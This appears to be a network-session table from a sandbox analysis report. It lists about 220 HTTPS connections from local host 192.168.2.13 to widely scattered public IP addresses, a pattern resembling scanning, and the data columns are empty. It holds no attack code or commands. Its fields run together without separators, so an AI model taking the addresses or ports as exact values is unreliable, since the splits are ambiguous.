                                                17728192.168.2.1353602161.119.117.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17729192.168.2.1352386136.6.254.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17730192.168.2.135897259.27.182.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17731192.168.2.135585636.172.34.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17732192.168.2.1347314111.31.15.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17733192.168.2.134297423.244.184.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17734192.168.2.1338600150.7.180.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17735192.168.2.1343654180.255.241.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17736192.168.2.1353566102.143.147.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17737192.168.2.1348328212.141.53.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17738192.168.2.1344402118.212.171.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17739192.168.2.1344946125.245.5.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17740192.168.2.1353336149.83.222.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17741192.168.2.1355432169.126.76.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17742192.168.2.1340608223.43.202.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17743192.168.2.1358736107.131.245.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17744192.168.2.135115620.47.188.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17745192.168.2.1352348191.224.25.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17746192.168.2.1353922114.100.19.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17747192.168.2.1352770121.231.207.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17748192.168.2.135655035.126.39.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17749192.168.2.1359380201.233.228.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17750192.168.2.1347356147.6.153.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17751192.168.2.1358708191.102.139.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17752192.168.2.135141470.41.193.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17753192.168.2.134875845.54.62.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17754192.168.2.1353520184.155.225.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17755192.168.2.1335898100.231.230.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17756192.168.2.136018459.9.1.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17757192.168.2.1357284221.84.98.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17758192.168.2.1360266176.53.19.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17759192.168.2.135114680.90.177.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17760192.168.2.133969013.87.40.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17761192.168.2.135190070.77.255.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17762192.168.2.1335820153.203.134.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17763192.168.2.1342128126.91.251.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17764192.168.2.134932614.134.2.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17765192.168.2.13530924.98.227.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17766192.168.2.1358010196.29.172.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17767192.168.2.134003637.134.76.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17768192.168.2.1356902151.97.1.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17769192.168.2.1350354185.55.10.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17770192.168.2.134285638.203.153.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17771192.168.2.133392869.111.58.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17772192.168.2.1352460145.146.85.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17773192.168.2.1356620152.4.109.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17774192.168.2.1351308220.74.96.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17775192.168.2.1339668183.225.164.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17776192.168.2.1334364132.145.2.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17777192.168.2.1341134186.120.167.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17778192.168.2.1355600210.102.149.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17779192.168.2.1339444128.188.97.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17780192.168.2.1360498129.2.174.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17781192.168.2.1333630170.21.158.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17782192.168.2.134364817.215.111.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17783192.168.2.1358654128.16.38.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17784192.168.2.133334632.10.114.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17785192.168.2.1340124132.41.191.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17786192.168.2.134788458.134.198.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17787192.168.2.1335274156.149.9.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17788192.168.2.1357526133.27.65.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17789192.168.2.1348348220.177.6.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17790192.168.2.1354420218.255.136.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17791192.168.2.135591257.39.226.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17792192.168.2.1359448206.145.202.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17793192.168.2.135170696.229.44.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17794192.168.2.1346410175.78.68.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17795192.168.2.1334408206.23.149.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17796192.168.2.1346386136.63.63.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17797192.168.2.1342460106.181.133.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17798192.168.2.1356764153.108.219.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17799192.168.2.133905682.121.44.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17800192.168.2.1344854181.252.125.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17801192.168.2.135429286.67.69.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17802192.168.2.1360570186.20.35.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17803192.168.2.1348902131.23.175.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17804192.168.2.1348784172.208.95.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17805192.168.2.133653490.206.85.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17806192.168.2.134898449.242.172.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17807192.168.2.1355338104.253.119.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17808192.168.2.134945666.23.74.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17809192.168.2.1345266168.241.230.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17810192.168.2.1341064153.178.206.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17811192.168.2.135686647.75.225.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17812192.168.2.1338640141.84.174.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17813192.168.2.135960841.203.234.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17814192.168.2.1360654149.177.238.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17815192.168.2.1343248196.109.76.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17816192.168.2.1344284166.43.102.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17817192.168.2.1341662174.89.12.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17818192.168.2.135123812.68.118.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17819192.168.2.1342206202.21.177.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17820192.168.2.133281878.122.77.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17821192.168.2.1336760114.203.243.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17822192.168.2.134203883.31.46.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17823192.168.2.1338182120.249.147.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17824192.168.2.1334620120.156.127.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17825192.168.2.134181067.225.130.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17826192.168.2.134540423.4.231.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17827192.168.2.1340432110.31.99.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17828192.168.2.1344288197.28.48.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17829192.168.2.1350628175.57.238.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17830192.168.2.1359898195.105.150.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17831192.168.2.1351382116.54.19.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17832192.168.2.1345126108.175.215.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17833192.168.2.1345634186.182.71.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17834192.168.2.135037468.139.38.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17835192.168.2.133761065.119.52.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17836192.168.2.1333418121.69.245.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17837192.168.2.1342338120.11.9.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17838192.168.2.134098868.55.62.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17839192.168.2.133809212.153.143.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17840192.168.2.133449465.112.172.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17841192.168.2.134764480.198.79.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17842192.168.2.1333408123.97.115.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17843192.168.2.1348474178.124.228.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17844192.168.2.1344490178.82.117.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17845192.168.2.1359516175.214.154.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17846192.168.2.1348416220.36.141.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17847192.168.2.134761846.28.67.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17848192.168.2.1344794130.13.248.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17849192.168.2.1338144136.118.227.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17850192.168.2.133503624.252.55.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17851192.168.2.1340260134.12.5.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17852192.168.2.135049892.68.47.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17853192.168.2.1337746122.144.128.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17854192.168.2.1350782217.111.34.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17855192.168.2.134169250.248.217.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17856192.168.2.1349438132.226.201.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17857192.168.2.134672460.198.216.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17858192.168.2.1352836111.57.48.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17859192.168.2.1335904120.89.2.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17860192.168.2.133529492.11.162.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17861192.168.2.1333504176.45.79.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17862192.168.2.135731036.224.99.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17863192.168.2.1351856123.209.81.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17864192.168.2.13494704.210.11.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17865192.168.2.134112498.182.171.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17866192.168.2.1353392168.108.76.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17867192.168.2.1342876188.84.30.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17868192.168.2.1344226155.236.206.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17869192.168.2.1353374148.198.131.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17870192.168.2.133811454.92.146.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17871192.168.2.1335786168.244.65.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17872192.168.2.1339956137.191.46.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17873192.168.2.1343984213.156.44.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17874192.168.2.1353048103.35.136.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17875192.168.2.1354438148.107.233.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17876192.168.2.135182078.221.246.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17877192.168.2.134155820.152.201.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17878192.168.2.1345844159.17.117.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17879192.168.2.133754874.149.244.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17880192.168.2.1345268184.170.232.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17881192.168.2.1335326163.115.52.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17882192.168.2.1345884211.200.144.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17883192.168.2.134747697.243.162.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17884192.168.2.1340916206.142.107.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17885192.168.2.1336166179.77.31.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17886192.168.2.1334086182.5.194.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17887192.168.2.1357894181.197.135.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17888192.168.2.1335530216.139.189.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17889192.168.2.135595053.110.194.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17890192.168.2.133552072.119.187.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17891192.168.2.1339874187.24.169.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17892192.168.2.134820814.43.128.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17893192.168.2.1357196182.157.200.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17894192.168.2.1350648139.12.214.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17895192.168.2.1355430123.250.182.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17896192.168.2.1343306148.184.210.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17897192.168.2.1358380102.144.113.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17898192.168.2.133644070.190.53.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17899192.168.2.134975245.2.0.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17900192.168.2.133342687.121.97.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17901192.168.2.1347916112.73.164.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17902192.168.2.13543622.148.17.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17903192.168.2.1350610179.140.176.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17904192.168.2.1335104101.245.236.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17905192.168.2.1351358193.63.47.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17906192.168.2.135833252.219.219.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17907192.168.2.13383744.180.188.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17908192.168.2.1352784213.172.156.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17909192.168.2.134946463.247.214.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17910192.168.2.133622290.32.67.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17911192.168.2.133938640.159.89.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17912192.168.2.1340452152.113.73.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17913192.168.2.13530349.201.248.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17914192.168.2.1349958136.158.83.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17915192.168.2.1342758213.79.213.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17916192.168.2.133870236.66.252.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17917192.168.2.134803052.236.232.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17918192.168.2.134977477.219.77.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17919192.168.2.1339404191.25.183.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17920192.168.2.1350304184.95.162.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17921192.168.2.1358434151.32.28.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17922192.168.2.1356672161.135.158.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17923192.168.2.136007838.118.118.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17924192.168.2.135905468.163.204.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17925192.168.2.1333922187.41.21.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17926192.168.2.135534880.198.199.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17927192.168.2.1349800197.26.84.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17928192.168.2.1352696154.183.218.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17929192.168.2.13556021.59.46.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17930192.168.2.134231283.226.48.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17931192.168.2.135193891.17.210.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17932192.168.2.135786293.152.117.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17933192.168.2.1339610194.15.146.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17934192.168.2.1339366157.163.238.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17935192.168.2.1349734154.236.181.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17936192.168.2.1349590187.159.42.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17937192.168.2.134884234.57.190.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17938192.168.2.133427042.183.35.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17939192.168.2.135668881.207.203.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17940192.168.2.1341402147.27.75.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17941192.168.2.1349426203.132.72.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17942192.168.2.135952437.44.192.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17943192.168.2.1336508108.173.229.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17944192.168.2.1355296125.67.233.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17945192.168.2.1344276104.200.100.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17946192.168.2.133690858.38.208.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17947192.168.2.1341188114.213.132.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17948192.168.2.135390296.240.177.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17949192.168.2.1341904135.16.76.3443
                                                TimestampBytes transferredDirectionData


